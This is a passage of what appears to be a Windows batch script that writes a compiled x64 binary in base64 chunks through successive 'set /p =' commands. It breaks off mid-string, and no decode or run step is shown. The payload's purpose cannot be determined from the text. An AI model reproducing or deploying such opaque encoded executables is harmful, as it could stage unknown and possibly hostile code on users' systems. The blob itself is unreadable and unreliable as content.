set /p =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
set /p =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
set /p =AABggwAADIUBAAEUBAAUcg1gDDALUCEAAgAAdA8AoIQAAAOFAABQhQEAIQAAAKCEAAADhQAAUIUBACEFAgAFdA8AoIQAAAOFAABQhQEAARQEABRyDWAMMAtQIQACAAB0DwBAhgAAo4YAAJSFAQAhAAAAQIYAAKOGAACUhQEAIQUCAAV0DwBAhgAAo4YAAJSFAQABFAQAFHINYAwwC1AhAAIAAHQPAOCHAAA/iAAA2IUBACEAAADghwAAP4gAANiFAQAhBQIABXQPAOCHAAA/iAAA2IUBAAEUBAAUcg1gDDALUCEAAgAAdA8AcIkAAM+JAAAchgEAIQAAAHCJAADPiQAAHIYBACEFAgAFdA8AcIkAAM+JAAAchgEAARQEABRyDWAMMAtQIQACAAB0DwAAiwAAYYsAAGCGAQAhAAAAAIsAAGGLAABghgEAIQUCAAV0DwAAiwAAYYsAAGCGAQABFAQAFHINYAwwC1AhAAIAAHQPAKCMAAABjQAApIYBACEAAACgjAAAAY0AAKSGAQAhBQIABXQPAKCMAAABjQAApIYBAAEUBAAUcg1gDDALUCEABgAA9A8AAOQOAAB0DQBAjgAAbo4AABiHAQAhAAAAQI4AAG6OAAAYhwEAIQAAAG6OAADgjgAAAIcBACEFAgAF9A8Abo4AAOCOAAAAhwEAIQoEAArkDgAFdA0AQI4AAG6OAAAYhwEAARcGABdSENAOwAxgCzAKUAEEAQAEYgAAIQACAADUCwCQkQAAIZIAAGiHAQAhAAAAkJEAACGSAABohwEAIQUCAAXUCwCQkQAAIZIAAGiHAQABHggAHmQNAB40DAAeUhfAFXAUUCEABAAAdAQAAGQJAMCUAADplAAA5IcBACEAAADAlAAA6ZQAAOSHAQAhAAIAAHQEAMCUAADplAAA5IcBACEAAgAAdAQAwJQAAOmUAADkhwEAIRYEABZ0BAAFZAkAwJQAAOmUAADkhwEAARIDABJCCzAKUAAAAQQBAARCAAABDwYAD2QHAA80BgAPMgtwAQoEAAo0BgAKMgZwASQNACR0NgAkZDUAJDQ0ACQBLgAY8BbgFNASwBBQAAABCgQACjQGAAoyBnABDwYAD2QLAA80CgAPcgtwAQoEAAo0BwAKMgZwAQYCAAYyAjABBAEABEIAAAEUCAAUZAkAFFQIABQ0BwAUMhBwARAGABBkCAAQNAYAEDIMcAEPBgAPZAgADzQHAA8yC3ABBAEABEIAAAEPBgAPZAcADzQGAA8yC3ABDwYAD2QHAA80BgAPMgtwAQQBAARCAAABBAEABEIAAAEKBAAKNAoACnIGcAEgCgAgATMAEfAP4A3QC8AJcAhgBzAGUAEEAQAEYgAAAQQBAARiAAABBAEABGIAAAEEAQAEQgAAAQYCAAYyAjABDwYAD2QNAA80CgAPcgtwAQ8GAA9kDQAPNAoAD3ILcAEEAQAEQgAAARwMABxkDgAcVA0AHDQMABxSGPAW4BTQEsAQcAEEAQAEYgAAAQ0GAA1UDQANcgnAB3AGYAEfDAAfdBMAH2QSAB